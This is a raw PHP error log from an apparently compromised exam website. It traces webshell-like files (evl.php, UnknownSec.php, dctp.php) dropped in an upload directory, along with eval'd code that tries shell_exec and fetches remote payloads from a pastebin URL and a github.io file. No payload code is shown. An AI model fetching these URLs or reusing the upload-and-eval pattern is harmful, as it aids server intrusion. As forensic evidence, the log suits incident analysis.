[16-Sep-2022 13:21:40 UTC] PHP Parse error:  syntax error, unexpected end of file in /home/k4645222/public_html/ujian/upload/temp/pmb763531.php on line 530
[16-Sep-2022 13:21:44 UTC] PHP Parse error:  syntax error, unexpected end of file in /home/k4645222/public_html/ujian/upload/temp/pmb763531.php on line 530
[16-Sep-2022 13:23:29 UTC] PHP Parse error:  syntax error, unexpected ''<form action=\"\" method=\"po' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /home/k4645222/public_html/ujian/upload/temp/upoad.php on line 1
[16-Sep-2022 13:23:32 UTC] PHP Parse error:  syntax error, unexpected ''<form action=\"\" method=\"po' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /home/k4645222/public_html/ujian/upload/temp/upoad.php on line 1
[16-Sep-2022 13:28:32 UTC] PHP Parse error:  syntax error, unexpected ''<form action=\"\" method=\"po' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /home/k4645222/public_html/ujian/upload/temp/upoad.pHP on line 1
[16-Sep-2022 13:29:48 UTC] PHP Parse error:  syntax error, unexpected ''<form action=\"\" method=\"po' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /home/k4645222/public_html/ujian/upload/temp/upoad.php on line 1
[16-Sep-2022 13:29:51 UTC] PHP Parse error:  syntax error, unexpected ''<form action=\"\" method=\"po' (T_CONSTANT_ENCAPSED_STRING), expecting identifier (T_STRING) in /home/k4645222/public_html/ujian/upload/temp/upoad.pHP on line 1
[16-Sep-2022 13:29:54 UTC] PHP Parse error:  syntax error, unexpected end of file in /home/k4645222/public_html/ujian/upload/temp/pmb763531.php on line 530
[16-Sep-2022 13:32:10 UTC] PHP Notice:  Undefined index: get in /home/k4645222/public_html/ujian/upload/temp/evl.php on line 1
[16-Sep-2022 13:32:36 UTC] PHP Warning:  shell_exec() has been disabled for security reasons in /home/k4645222/public_html/ujian/upload/temp/evl.php(1) : eval()'d code on line 1
[16-Sep-2022 13:32:45 UTC] PHP Warning:  shell_exec() has been disabled for security reasons in /home/k4645222/public_html/ujian/upload/temp/evl.php(1) : eval()'d code on line 1
[16-Sep-2022 13:34:17 UTC] PHP Warning:  file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/k4645222/public_html/ujian/upload/temp/evl.php(1) : eval()'d code on line 1
[16-Sep-2022 13:34:17 UTC] PHP Warning:  file_get_contents(https://pastebin.com/raw/f7sFB93G): failed to open stream: no suitable wrapper could be found in /home/k4645222/public_html/ujian/upload/temp/evl.php(1) : eval()'d code on line 1
[16-Sep-2022 13:43:49 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[16-Sep-2022 13:44:55 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[16-Sep-2022 13:44:59 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[16-Sep-2022 13:45:12 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[16-Sep-2022 16:29:15 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[17-Sep-2022 07:58:09 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[17-Sep-2022 14:27:18 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[17-Sep-2022 14:27:33 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[26-Sep-2022 13:47:17 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[03-Oct-2022 13:43:14 UTC] PHP Deprecated:  Function create_function() is deprecated in /home/k4645222/public_html/ujian/upload/temp/UnknownSec.php on line 73
[06-Nov-2022 14:50:00 UTC] PHP Warning:  fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Warning:  fopen(https://fierza-dev.github.io/1.txt): failed to open stream: no suitable wrapper could be found in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Warning:  fgets() expects parameter 1 to be resource, bool given in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Notice:  Array to string conversion in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:50:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.pHp on line 1
[06-Nov-2022 14:52:00 UTC] PHP Warning:  fopen(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Warning:  fopen(https://fierza-dev.github.io/1.txt): failed to open stream: no suitable wrapper could be found in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Warning:  fgets() expects parameter 1 to be resource, bool given in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Notice:  Array to string conversion in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
[06-Nov-2022 14:52:00 UTC] PHP Notice:  Undefined variable:  in /home/k4645222/public_html/ujian/upload/temp/dctp.php on line 1
